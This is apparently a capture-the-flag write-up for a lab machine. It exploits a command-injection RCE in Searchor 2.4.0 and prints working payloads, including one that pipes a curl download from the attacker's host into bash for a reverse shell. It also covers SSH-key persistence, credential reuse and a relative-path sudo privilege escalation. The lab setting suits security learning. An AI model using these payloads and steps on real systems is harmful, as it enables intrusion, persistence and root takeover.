-
The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.208 -oG scan
/opt/extractports scan
nmap -p22,80 -sCV -Pn 10.10.11.208 -oN ports
- I found the domain
searcher.htb and add it to the hosts file
-
Upon entering the page I find that it is running Searchor 2.4.0. Searching for information about it I find a vulnerability reported in CVE-2023-43364. This CVE indicates a vulnerability that allows an RCE.
-
I start by running a test to validate that this CVE works. I add code to make a GET request to a server that I set up locally. I observe that when I send the request I receive in my server the call. With this I validate that it works correctly and I can exploit it.
', exec("import os;os.system('curl http://10.10.14.19/pepe');"))#
-
I use pentestmonkey’s revershell to set up a reverse shell. Thanks to this I can move through the system files and read the first flag.
', exec("import os;os.system('curl http://10.10.14.19/rever.sh | bash -i');"))#
-
To make it easier for me to persist in the system, I create an ssh key and add my public key to the authorized_keys file.
ssh-keygen -f key
cat key.pub
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /home/svc/.ssh/authorized_keys
ssh -i key svc@10.10.11.208
-
When consulting the ports in use on the system I find several that are not accessible from the outside. I share them via ssh to consult them from my machine.
ssh -L 3000:127.0.0.1:3000 -L 5000:127.0.0.1:5000 -L 3306:127.0.0.1:3306 -L 44409:127.0.0.1:44409 -L 222:127.0.0.1:222 -i key svc@10.10.11.208
- In one of the ports I see that gitea is running. First I have to add to the hosts file the domain.
-
When searching in the gitea files I find a file containing the credentials of a user.
- I validate if the password found belongs to any user other than cody and I see that it is the svc password. The user we previously had control with a shell.
-
I list which commands you can run with sudo without providing a password and find a python file.
-
With this python file I can execute several docker commands. One of them is docker-inspect which allows me to see the container configuration.
-
When consulting the configuration of the mysql_db container I find some passwords with which I can connect to mysql
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '' mysql_db
-
Inside mysql I can’t find anything relevant. I check the password reuse and validate that it is the same as the one used by administrator in gitea. This allows me to consult its repository that contains the source code of this application that I can run as root thanks to sudo.
-
Looking at the source code I find that in most cases absolute paths are used except when executing full-checkup.
-
I look at the user’s PATH and create a file in the first directory that I have write permissions a full-checkup.sh file containing a script that allows me to escalate my privileges.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
-
I run the program and get my script to run. This allows me to launch a new terminal as root and read the second flag.
